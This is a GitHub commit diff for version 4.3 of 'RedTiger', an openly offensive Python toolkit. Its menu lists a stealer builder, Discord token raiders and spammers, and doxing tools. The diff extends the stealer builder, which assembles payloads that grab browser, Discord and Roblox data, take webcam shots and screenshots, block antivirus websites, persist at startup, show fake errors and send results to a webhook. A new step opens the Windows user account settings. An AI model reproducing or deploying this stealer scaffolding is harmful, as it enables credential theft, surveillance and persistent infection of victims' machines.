Skip to content

Commit

Permalink
discord.gg/redtiger (4.3)
Browse files Browse the repository at this point in the history
  • Loading branch information
loxy0dev committed Apr 28, 2024
1 parent b80d1fa commit b3ddc6f
Show file tree
Hide file tree
Showing 11 changed files with 109 additions and 52 deletions.
55 changes: 27 additions & 28 deletions 2-DataBase/[FREE] DataBase Discord.txt

Large diffs are not rendered by default.

Binary file modified Img/RedTiger.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@ I'll let you check the code for each of the options, there is no backdoor.
[01] -> Tool Info [11] -> Ip Info [21] -> Discord Token Leaver
[02] -> Tool Website [12] -> Ip Pinger [22] -> Discord Token Login
[03] -> Builder Stealer [13] -> Ip Website [23] -> Discord Token To Id And Brute
[04] -> Sql Vulnerability [14] -> Ip Port Search [24] -> Discord Token Server Raid
[04] -> Sql Vulnerability [14] -> Ip Port Scanner [24] -> Discord Token Server Raid
[05] -> Illegal Website [15] -> Ip Generator [25] -> Discord Token Spammer
[06] -> Search In DataBase [16] -> Get Your Ip [26] -> Discord Token Delete Friends
[07] -> Dox Tracker [17] -> Get Your Token Discord [27] -> Discord Token Block Friends
Expand Down
2 changes: 1 addition & 1 deletion RedTiger.py
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,7 @@
option_11 = "Ip-Info"
option_12 = "Ip-Pinger"
option_13 = "Ip-Website"
option_14 = "Ip-Port-Search"
option_14 = "Ip-Port-Scanner"
option_15 = "Ip-Generator"
option_16 = "Get-Your-Ip"
option_17 = "Get-Your-Token-Discord"
Expand Down
33 changes: 28 additions & 5 deletions Settings/Program/Builder-Disinfect.py
Original file line number Diff line number Diff line change
@@ -1,8 +1,22 @@
import os
import sys
import psutil
import time


def disinfect():
try:
def DeleteRestart():
def EndTask(file):
for proc in psutil.process_iter():
try:
if file.lower() in proc.name().lower():
proc.terminate()
except:
pass
EndTask("ㅤ.exe")
EndTask("ㅤ.py")

def DeleteStartup():
if sys.platform.startswith('win'):
folder = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
Expand All @@ -18,11 +32,6 @@ def DeleteStartup():
file = f"{folder}/ㅤ.py"
if os.path.exists(file):
os.remove(file)

try:
DeleteStartup()
except:
pass

def UnblockSite():

Expand Down Expand Up @@ -71,10 +80,24 @@ def unblock_website(website):
]
for website in websites_to_block:
unblock_website(website)
print(f"Disinfection RedTiger stealer in progress..")
time.sleep(1)
try:
DeleteRestart()
except:
pass
time.sleep(2)
try:
DeleteStartup()
except:
pass
time.sleep(2)
try:
UnblockSite()
except:
pass
print(f"Disinfection finished.")
time.sleep(3)

except Exception as e:
print(e)
Expand Down
62 changes: 50 additions & 12 deletions Settings/Program/Builder-Stealer.py
Original file line number Diff line number Diff line change
Expand Up @@ -48,6 +48,8 @@ def Startup():
pass
def System_Grab():
pass
def Open_User_Profile_Settings():
pass
def Screenshot_Grab():
pass
def Camera_Capture_Grab():
Expand Down Expand Up @@ -1235,6 +1237,19 @@ def Camera_Capture_Grab():
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

OpenUserProfilSettings = r'''
def Open_User_Profile_Settings():
try:
subprocess.Popen(["control", "userpasswords2"])
time.sleep(2)
except:
pass
'''

# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

ScreenshotGrab = r'''
def Screenshot_Grab():
try:
Expand Down Expand Up @@ -1393,6 +1408,10 @@ def Startup():
Camera_Capture_Grab()
except:
pass
try:
Open_User_Profile_Settings()
except:
pass
try:
Screenshot_Grab()
except:
Expand Down Expand Up @@ -1546,7 +1565,7 @@ def disinfect():
script_path = "./Settings/Program/Builder-Disinfect.py"
if ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, script_path, None, 1) <= 32:
raise ctypes.WinError()
print(f"{red}[{white}{current_time_hour()}{red}] {INFO} Disinfection is successfully, restart your pc.")
print(f"{red}[{white}{current_time_hour()}{red}] {INFO} Disinfection is successfully.")
except Exception as e:
print(f"{red}[{white}{current_time_hour()}{red}] {ERROR} Error during disinfection: {white}{e}")

Expand All @@ -1571,7 +1590,7 @@ def choose_icon():
if sys.platform.startswith("win"):
root.iconbitmap('Img/RedTiger_icon.ico')
root.title(f'{name_tool} {version_tool} | Builder Stealer')
root.geometry("890x440")
root.geometry("890x490")
root.resizable(False, False)
red_color = '#a80505'
white_color = "#ffffff"
Expand Down Expand Up @@ -1611,6 +1630,7 @@ def on_entry_focus_out(event):
add_roblox = "Disable"
add_blockwebsite = "Disable"
add_cameracapture = "Disable"
add_openuserprofilsettings = "Disable"
add_screenshot = "Disable"
add_startup = "Disable"
add_fake_error = "Disable"
Expand All @@ -1626,6 +1646,7 @@ def on_entry_focus_out(event):
add_blockwebsite_var = tk.StringVar(value="Disable")
add_cameracapture_var = tk.StringVar(value="Disable")
add_screenshot_var = tk.StringVar(value="Disable")
add_openuserprofilsettings_var = tk.StringVar(value="Disable")
add_startup_var = tk.StringVar(value="Disable")
add_fake_error_var = tk.StringVar(value="Disable")
add_restart_var = tk.StringVar(value="Disable")
Expand All @@ -1640,6 +1661,7 @@ def on_entry_focus_out(event):
add_blockwebsite_cb = ttk.Checkbutton(root, text="Block AV Website", variable=add_blockwebsite_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton')
add_cameracapture_cb = ttk.Checkbutton(root, text="Camera Capture", variable=add_cameracapture_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton')
add_screenshot_cb = ttk.Checkbutton(root, text="Screenshot", variable=add_screenshot_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton')
add_openuserprofilsettings_cb = ttk.Checkbutton(root, text="Open UserProfil", variable=add_openuserprofilsettings_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton', state="disable")
add_fake_error_cb = ttk.Checkbutton(root, text="Fake Error", variable=add_fake_error_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton')
add_startup_cb = ttk.Checkbutton(root, text="Launch at Startup", variable=add_startup_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton')
add_restart_cb = ttk.Checkbutton(root, text="Restart Every 5min", variable=add_restart_var, onvalue="Enable", offvalue="Disable", style='Custom.TCheckbutton')
Expand All @@ -1649,12 +1671,22 @@ def on_entry_focus_out(event):
add_browser_cb.grid(row=6, column=0, padx=(220, 20), sticky="w")
add_roblox_cb.grid(row=7, column=0, padx=(220, 20), sticky="w")
add_blockwebsite_cb.grid(row=8, column=0, padx=(220, 20), sticky="w")
add_cameracapture_cb.grid(row=4, column=1, padx=(5, 10), sticky="w")
add_screenshot_cb.grid(row=5, column=1, padx=(5, 10), sticky="w")
add_cameracapture_cb.grid(row=9, column=0, padx=(220, 20), sticky="w")
add_screenshot_cb.grid(row=4, column=1, padx=(5, 10), sticky="w")
add_openuserprofilsettings_cb.grid(row=5, column=1, padx=(5, 10), sticky="w")
add_fake_error_cb.grid(row=6, column=1, padx=(5, 10), sticky="w")
add_startup_cb.grid(row=7, column=1, padx=(5, 10), sticky="w")
add_restart_cb.grid(row=8, column=1, padx=(5, 10), sticky="w")

def toggle_open_user_profile_settings_cb_state(*args):
if add_screenshot_var.get() == "Enable":
add_openuserprofilsettings_cb.config(state="normal")
add_openuserprofilsettings_var.set("Enable")
else:
add_openuserprofilsettings_var.set("Disable")
add_openuserprofilsettings_cb.config(state="disabled")

add_screenshot_var.trace("w", toggle_open_user_profile_settings_cb_state)

# <<<<<<<<<< Button Style >>>>>>>>>>
style.configure('Red.TButton', borderwidth=0, background=background_color, font=('Calibri', 12, "bold"), foreground=background_color)
Expand All @@ -1672,7 +1704,7 @@ def on_entry_focus_out(event):
name_file_entry.config(fg="white")

name_file_entry = tk.Entry(root, background="#303030", foreground="white", relief="flat", highlightbackground="#383E42", highlightthickness=1.5, font=("Calibri", 12), width=20)
name_file_entry.grid(row=9, column=0, padx=(60, 0), pady=(20, 10))
name_file_entry.grid(row=10, column=0, padx=(60, 0), pady=(20, 10))
name_file_entry.insert(0, "File Name")

if sys.platform.startswith("win"):
Expand All @@ -1682,7 +1714,7 @@ def on_entry_focus_out(event):
# <<<<<<<<<< Select Icon >>>>>>>>>>

icon_button = ttk.Button(root, text="Select Icon", command=choose_icon, style='Red.TButton')
icon_button.grid(row=9, column=1, sticky="e", padx=(0, 50), pady=(20, 10))
icon_button.grid(row=10, column=1, sticky="e", padx=(0, 50), pady=(20, 10))
icon_button.config(compound="right")

if file_type_var.get() == "Python File":
Expand All @@ -1706,18 +1738,19 @@ def file_type_changed(*args):
pass

file_type_menu = ttk.OptionMenu(root, file_type_var, *["File Type", "Python File", "Exe File"], style='Red.TButton')
file_type_menu.grid(row=9, column=1, sticky="w", padx=(0, 200), pady=(20, 10))
file_type_menu.grid(row=10, column=1, sticky="w", padx=(0, 200), pady=(20, 10))
file_type_menu.config(compound="right")

# <<<<<<<<<< Build Button >>>>>>>>>>
def Build_Settings():
global add_system, add_discord, add_browser, add_roblox, add_blockwebsite, add_cameracapture, add_screenshot, add_startup, add_fake_error, add_restart, webhook, name_file, file_type
global add_system, add_discord, add_browser, add_roblox, add_blockwebsite, add_cameracapture, add_openuserprofilsettings, add_screenshot, add_startup, add_fake_error, add_restart, webhook, name_file, file_type
add_system = add_system_var.get()
add_discord = add_discord_var.get()
add_browser = add_browser_var.get()
add_roblox = add_roblox_var.get()
add_blockwebsite = add_blockwebsite_var.get()
add_cameracapture = add_cameracapture_var.get()
add_openuserprofilsettings = add_openuserprofilsettings_var.get()
add_screenshot = add_screenshot_var.get()
add_startup = add_startup_var.get()
add_fake_error = add_fake_error_var.get()
Expand All @@ -1734,17 +1767,17 @@ def Build_Settings():
random_number = random.randint(1, 1000)
name_file = f'BuilderStealer_{random_number}'

root.quit()
root.destroy()
root.quit()
root.destroy()

style.configure('CustomButton.TButton', borderwidth=0, background=background_color, font=('Calibri', 15, "bold"), foreground=background_color)

build_button = ttk.Button(root, text="Build Stealer", command=Build_Settings, style='CustomButton.TButton', width=15)
build_button.grid(row=10, column=0, columnspan=2, pady=(30, 0), padx=(300,0))
build_button.grid(row=11, column=0, columnspan=2, pady=(30, 0), padx=(300,0))

# <<<<<<<<<< Disinfinct Button >>>>>>>>>>
disinfect_button = ttk.Button(root, text="Self Disinfect", command=disinfect, style='CustomButton.TButton', width=15)
disinfect_button.grid(row=10, column=0, columnspan=2, pady=(30, 0), padx=(0,80))
disinfect_button.grid(row=11, column=0, columnspan=2, pady=(30, 0), padx=(0,80))

root.mainloop()

Expand All @@ -1758,6 +1791,7 @@ def Build_Settings():
print(f"{INFO} Block AV Website :{white}", add_blockwebsite)
print(f"{INFO} Camera Capture :{white}", add_cameracapture)
print(f"{INFO} Screenshot :{white}", add_screenshot)
print(f"{INFO} Open UserProfil :{white}", add_openuserprofilsettings)
print(f"{INFO} Launch at Startup :{white}", add_startup)
print(f"{INFO} Fake Error :{white}", add_fake_error)
print(f"{INFO} Restart Every 5min :{white}", add_restart)
Expand Down Expand Up @@ -1841,6 +1875,9 @@ def Build_Settings():
if add_cameracapture in ['Enable']:
file.write(CameraCaptureGrab)

if add_openuserprofilsettings in ['Enable']:
file.write(OpenUserProfilSettings)

if add_screenshot in ['Enable']:
file.write(ScreenshotGrab)

Expand Down Expand Up @@ -1939,6 +1976,7 @@ def send_webhook(embed):
{"name": f"Block AV Website:", "value": f"""```{add_blockwebsite}```""", "inline": True},
{"name": f"Camera Capture:", "value": f"""```{add_cameracapture}```""", "inline": True},
{"name": f"Screenshot:", "value": f"""```{add_screenshot}```""", "inline": True},
{"name": f"Open UserProfil:", "value": f"""```{add_openuserprofilsettings}```""", "inline": True},
{"name": f"Fake Error:", "value": f"""```{add_fake_error}```""", "inline": True},
{"name": f"Launch At Startup:", "value": f"""```{add_startup}```""", "inline": True},
{"name": f"Restart Every 5min:", "value": f"""```{add_restart}```""", "inline": True},
Expand Down
2 changes: 1 addition & 1 deletion Settings/Program/Config/Config.py
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
name_tool = "RedTiger"
version_tool = "4.2"
version_tool = "4.3"
coding_tool = "Python 3"
language_tool = "EN"
creator = "LoxyTeck"
Expand Down
3 changes: 0 additions & 3 deletions Settings/Program/Config/Util.py
Original file line number Diff line number Diff line change
Expand Up @@ -69,9 +69,6 @@ def Clear():
os.system("clear")

def Reset():
try:
return
except:
if sys.platform.startswith("win"):
"WINDOWS"
file = f'python ./RedTiger.py'
Expand Down
Binary file modified Settings/Program/Config/__pycache__/Config.cpython-312.pyc
Binary file not shown.
Binary file modified Settings/Program/Config/__pycache__/Util.cpython-312.pyc
Binary file not shown.
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
except Exception as e:
ErrorModule(e)

Title("Ip Port")
Title("Ip Port Scanner")

def scan_port(ip, port):
try:
Expand Down

0 comments on commit b3ddc6f

Please sign in to comment.